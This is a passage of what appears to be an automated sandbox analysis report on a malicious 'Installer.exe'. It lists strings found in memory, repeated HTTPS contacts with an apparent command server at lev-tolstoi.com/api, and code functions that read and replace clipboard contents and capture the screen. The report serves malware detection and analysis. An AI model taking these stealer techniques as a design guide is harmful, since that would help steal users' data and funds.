                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Installer.exe, 00000003.00000003.1973390326.0000000003594000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/$5
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/.V
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/NVmA
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/S
                Source: Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1857732899.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522850186.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785844021.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1973344766.00000000035B8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835542248.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api#4
                Source: Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix:Z
                Source: Installer.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/espF
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi.W
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Installer.exe, 00000003.00000003.1715301771.000000000356D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715238902.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Installer.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Installer.exe, 00000003.00000003.1763175969.0000000005CE3000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1763272472.0000000005C97000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785769288.0000000005C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Installer.exe, 00000003.00000003.1763272472.0000000005C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Installer.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: Installer.exe, 00000003.00000003.1831936100.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1832003784.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: Installer.exe, 00000003.00000003.1762901890.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1762839863.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Installer.exe, 00000003.00000003.1809808944.0000000005D67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00433600 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433600
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_04FE1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_04FE1000
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00433600 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433600
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00433B7A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00433B7A
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_003410000_2_00341000
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0034F5550_2_0034F555
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_003677920_2_00367792
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00365C5E0_2_00365C5E
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00359CC00_2_00359CC0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00353FB20_2_00353FB2
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_003410002_2_00341000
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_0034F5552_2_0034F555
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_003677922_2_00367792
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00365C5E2_2_00365C5E
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00359CC02_2_00359CC0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00353FB22_2_00353FB2
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004121003_2_00412100
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042C9D43_2_0042C9D4
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00410A573_2_00410A57
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004152003_2_00415200
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004093703_2_00409370
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00426B703_2_00426B70
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00421B103_2_00421B10
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043CB203_2_0043CB20
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00423D403_2_00423D40
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040CD4E3_2_0040CD4E
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040ADEC3_2_0040ADEC
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004085F03_2_004085F0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00440E003_2_00440E00
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00422E3F3_2_00422E3F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004396A03_2_004396A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004417003_2_00441700
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040D7CF3_2_0040D7CF
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004088003_2_00408800
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041780D3_2_0041780D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004410D03_2_004410D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042788F3_2_0042788F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004039003_2_00403900
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041C9003_2_0041C900
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043A1203_2_0043A120
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004059303_2_00405930
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043D1C03_2_0043D1C0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004081D03_2_004081D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043A9D63_2_0043A9D6
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004259E43_2_004259E4
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004331803_2_00433180
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004249903_2_00424990
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004062403_2_00406240
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004312103_2_00431210
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041E2203_2_0041E220
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00427A3F3_2_00427A3F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004042B03_2_004042B0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004402B03_2_004402B0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041DB403_2_0041DB40
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004223703_2_00422370
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00408B003_2_00408B00
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00424B003_2_00424B00
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004283073_2_00428307
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004403D03_2_004403D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004413E03_2_004413E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00404BF03_2_00404BF0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041AB803_2_0041AB80
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00438C5D3_2_00438C5D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00416C773_2_00416C77
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00437C783_2_00437C78
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042AC303_2_0042AC30
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042F4F63_2_0042F4F6
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00419C903_2_00419C90
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004164923_2_00416492
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042CCA23_2_0042CCA2
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004074A03_2_004074A0
